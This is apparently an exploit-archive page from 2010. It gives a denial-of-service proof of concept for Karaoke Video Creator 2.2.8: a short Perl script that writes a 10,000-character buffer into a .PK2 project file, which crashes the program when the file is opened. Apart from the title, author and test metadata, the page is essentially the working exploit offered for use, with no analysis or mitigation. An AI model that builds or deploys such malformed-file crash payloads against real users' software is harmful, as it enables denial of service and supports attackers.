[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Karaoke Video Creator Denial of Service Vulnerability
# Published : 2010-08-20
# Author : PASSEWORD
# Previous Title : AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service Vulnerability
# Next Title : PlayPad Music Player v1.12 .mp3 Denial of Service Vulnerability
# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability
# Author: PASSEWORD
# Date: 2010-08-20
# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php
# Version : 2.2.8
# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers
# Tested on: Windows XP SP3 Fr
$buff="A" x 10000;
open (myfile , ">>PASS.PK2");
print myfile $buff;
close (myfile);